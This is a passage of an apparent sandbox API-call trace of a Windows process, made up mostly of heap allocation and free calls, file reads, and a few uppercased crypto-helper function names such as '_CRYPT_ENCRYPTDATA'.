0x8dedf8 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0179.019] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.019] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x6a9d, lpOverlapped=0x0) returned 1 [0179.021] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0179.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a9d) returned 0xbea018 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a9d) returned 0xbf0ac0 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a9d) returned 0xbea018 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0179.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.023] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a9d) returned 0xbea018 [0179.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0179.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0179.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0179.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a9d) returned 0xbf7568 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0179.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.025] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0179.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.026] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0179.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.026] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0179.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.027] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.028] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0179.029] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0179.029] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 